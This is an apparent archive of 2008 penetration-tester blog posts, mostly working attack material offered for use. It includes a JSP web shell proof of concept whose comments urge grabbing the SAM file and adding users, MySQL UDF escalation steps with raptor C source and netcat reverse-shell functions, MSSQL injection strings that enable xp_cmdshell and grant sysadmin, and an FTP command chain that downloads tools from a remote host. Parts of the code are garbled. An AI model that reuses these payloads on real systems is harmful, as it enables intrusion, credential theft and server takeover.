when “JSP” web application Run in Linux [ with tomcat or other Server ] , You can use Privilege of owner [runner] user . but , when you run This in windows [TOMCAT or Jrun web server ] , “JSP” Application take jrun or tomcat Access .

They have Administrator Access . Therefor You have Admin level process.

use [getRuntime().exec] Function in [JSP] you can run Process .

This is a test . [Detail]

import java.io.IOException;Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\"");

here is one of published PoC For this vulnerabilities

we can run it , [abysssec.jsp] -> :
< %@ page import="java.util.*,java.io.*"%> < % %>


< %--

abysssec inc public material
just upload this file with abysssec.jsp and execute your command

your command will run as administrator . you can download sam file

add user or do anything you want .

note : please be gentle and don't obstructionism .

vulnerability discovered by : abysssec.com
 --%>



 Abysssec inc (abysssec.com) JSP vulnerability<br />
<center><br />
<h3>JSP Privilege Escalation Vulnerability PoC</h3>
<p></center></p>
<form METHOD="GET" NAME="myform" ACTION="">
<input TYPE="text" NAME="cmd"/>
<input TYPE="submit" VALUE="Execute !"/>
</form>
<pre>
< %
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
<p>

# milw0rm.com [2008-11-28]

Privilege Escalation With MYSQL

daphne — Sat, 01 Nov 2008 21:00:43 +0000

GOD.

Hi, Privilege Escalation in windows (from 2000 to2008) with mysql DLL & Functions.

when you Install MYSQL in windows OS , if you forgot give Permission to “DATA” folder , an attacker can read ROOT Password in mysql DATABAS .

Example :

1- Goto :
C://program files/mysql5.0.45/data/mysql

2- READ —> user.MYD

3- Crack it with CAIN & Able or any tools you have.
root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E

ok , You can read Data and crack it , for Example cracked hash of atop : “Root:123456d” .

you can use “RAPTOR” , that is ciritical exploit , Add a Dynamic Library to Mysql. This Library will infect target dll like a trojan (REVERSE SHELL , NETCAT ) .

summary of RAPTOR :
MySQL provides a mechanism by which the default set of functions can be expanded by means of custom written dynamic libraries containing User Defined Functions, or UDFs. If MySQL is installed with root privileges, the UDF mechanism allows an attacker to install and run malicious code as root.

anyway , You can Connected To mysql with [asp,php,...]SHELL or PhpMyadmin or Terminal [In Example , I connected With Mysql Shell ]

Download Raptor in windows :

http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

c:\mysql> mysql -h 192.168.0.203

- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//winudf.dll’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘c://windows//system32//winudf.dll’;
-CREATE FUNCTION netcat RETURNS integer SONAME ‘winudf.dll’;
-CREATE FUNCTION exec RETURNS integer SONAME ‘winudf.dll’;
-DROP TABLE foo;

then when you write :

select * from mysql.func;

you must see up result .

you can run Command in Administrator Privilege , [example] :

– mysql> select exec(‘echo foo > c:\\bar.txt’);
– mysql> select netcat(’192.168.0.147′);

Technical information , why This happened ?

From Mysql 5 on, there is an scheduler available similar to SQLAgent and job scheduler in Oracle, so it seems
we have something to run our scripting code once ready.
However, it is not activated by default, but we can assume to execute the backdoor using a privileged account/
so this is not a big deal.
Mysql allows the creation of procedures and functions, but there is no scripting language available, so they
are limited to SQL sentences along with basic loops and conditions. Even access to writing and reading from
disk for saving results and reading files, is limited. It seems we cannot go too far this way …
However, Mysql implements an additional functionality very convenient to us: UDF (User Defined Functions).
This allows the definition of user functions and implement them in C++, compile them and use them from
Mysql as any other function of the database. It is not necessary to recompile the full database code, as these
functions are dynamically loaded from the plugin directory (since 5.1 version) and may be used from the
database normally.

Other Attack :

with this Root Privilege in mysql , You can use ROBOTIC ARM to Move file and give them Admin Privilege!

Example :

- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//shell.aspx’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘e://hosting//ebanking//shell.php’;

Linux version :
http://www.0xdeadbeef.info/exploits/raptor_udf.c

#include 
#include 

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
	unsigned int		arg_count;	// number of arguments
	enum Item_result	*arg_type;	// pointer to item_result
	char 			**args;		// pointer to arguments
	unsigned long		*lengths;	// length of string args
	char			*maybe_null;	// 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
	char			maybe_null;	// 1 if func can return NULL
	unsigned int		decimals;	// for real functions
	unsigned long 		max_length;	// for string functions
	char			*ptr;		// free ptr for func data
	char			const_item;	// 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if (args->arg_count != 1)
		return(0);

	system(args->args[0]);

	return(0);
}

In safeguard GOD .

Daphne .

Ms-Sql Injection Privilege Escalation !

daphne — Wed, 15 Oct 2008 20:54:14 +0000

Hi God .

Hi Again My Readers!
[Attention ] : I Break Long command .
1- In mssql , when your Privilege Is USER or Db_Owner You will can Enable XP_DIRTREE And Dir wanted Drive .

viewdetail.aspx?test=22′;exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00–

After Enable , You Can Execute Xp_dirtree and save Result In Database & view It.

2- Enable Execute in Administrator Privilege Without Execute Permission :

Enable XP_EXC:

viewdetail.aspx?test=22′;EXEC+sp_configure+
+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ‘show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping 127.0.0.1′ ;

3- Back UP From Database :

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\1.zip’;–

4- GUEST = DB_OWNER :

/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–

5 – ADDIN TO “BUILTIN\ADMINISTRATORS”

FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –

ENABLE OPENROWSET/OLEDB :

FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

7 – UPLOAD NETCAT or …

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’, ‘server=UNESCO;uid=BUILTIN\Administrators;pwd=’,'set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)

Code:

echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f

Another Way? !

You Can use PANGOLIN , it is good Sql injector with bypass some Protection :

Download :

http://www.nosec.org/

Enjoy .

Daphne .

bug in winpcap

daphne — Thu, 09 Oct 2008 15:42:28 +0000

BUG IN WINPCAP

I feel God Is here .

Hi dear , I’M Daphne , My job is Penetration Tester (Pen-Tester) , I write About This Subject and Around .

Pent-Test is Cool & funny job with hacking interesting subject.

anyway ….

I use winpcap 4.2(last version)

http://www.winpcap.org/install/default.htm

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load winpcap in windows :

BUG :

when Administrator or Other Power users in windows summon winpcap driver (such as wireshake or nmap or cain or …) driver loaded !

but , when close program , winpcap driver still in memory , That’s it .

when driver not unload , Guest user or IIS_User can load this driver in kernel level , and SNNIFF Admin Packet in administrator Level or get Administrator privilege .

I sniff packet with win dump in guest mod .
http://www.winpcap.org/windump/install/default.htm

Ok , I write This little tools for iis7 – iis6 in windows 2003 – 2008 :

usage :

load wireshake or other tool that run winpcap driver .

rename windump.exe to packet.exe and upload near winpcap.aspx and run it .

and then you can sniffed packed in 1.txt /

winpcap.aspx

<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>

this tools is sample .

in future i speak about how to Privilege escalation with kartoffell tools in drivers .;)

Abysssec Security Researches » daphne

Additional notes in PHP source code auditing

1 – Our PHP inputs Points :

2- Limiting our understanding :

writing a Browser fuzzer !!!

20 ways to php Source code fuzzing (Auditing)

How Bypass firewall with Process Injection

Execute with .CHM file.

Tomcat & Jrun Privilege Escalation (Windows)

Privilege Escalation With MYSQL

Ms-Sql Injection Privilege Escalation !

bug in winpcap

BUG IN WINPCAP

Discover By “DAPHNE IDEA SECURITY ” .